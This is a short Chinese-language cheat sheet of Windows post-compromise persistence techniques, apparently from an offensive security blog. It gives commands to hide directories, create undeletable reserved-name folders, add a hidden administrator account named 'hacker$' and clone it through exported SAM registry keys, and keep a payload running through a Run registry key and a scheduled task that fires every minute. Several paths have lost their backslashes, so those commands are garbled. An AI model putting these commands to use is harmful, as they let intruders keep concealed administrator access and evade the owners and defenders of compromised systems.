权限维持要点文件隐藏用户隐藏自动运行
权限维持要点1、权限维持最重要的是隐藏。
2、只需在入口等关键点做权限维持即可
1、目录隐藏
attrib +a +s +r +h 目录名
隐藏后通过cmd的dir或是图形界面均无法发现,除非知道目录名直接通过cmd访问。
2、畸形目录
md 目录名... #创建目录 rd /s /q 目录名... #删除目录
以此方式创建的目录无法被del直接删除,无法使用cd或dir对其操作,从图形界面也无法进入,但可以通过cmd向其中复制文件,或直接访问该文件。
使用aux、com1、com2、prn、con、nul等系统保留文件名创建文件或目录无法通过常规方式删除。无论创建删除还是访问都需要再完整路径前加//./来访问,否则将被当作io设备处理。
md \.C:UsersuserDesktoptestprn rd \.C:UsersuserDesktoptestprn用户隐藏
net user hacker$ abcd1234 /add net localgroup /add administrators hacker$ #将创建的用户添加到管理员组
在用户名后加$创建隐藏用户,无法通过net users查看,但可以通过net user用户名或图形界面查看
通过操作注册表可创建图形界面不可见的用户。
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers #用户信息注册表
win10默认无法看到默认注册表中的信息,需点击编辑-》权限,在图片所示位置打勾。
reg query HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames mkdir C:/reg reg export HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNameslow$ C:low.reg type C:low.reg reg query HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers reg export HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers�00003EB C:low1.reg
net user hacker$ /del regedit /s hacker.reg #这里的是导出的注册表文件名 regedit /s hacker1.reg #这里的是导出的注册表文件名自动运行
1、在注册表中添加开机启动项
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v mytask /t reg_sz /d "C:UsersqzhDesktoptask.bat"
2、添加计划任务
创建计划任务每分钟执行一次
schtasks /create /tn taskhacker /tr "C:UsersqzhDesktoptask.bat" /sc minute /mo 1
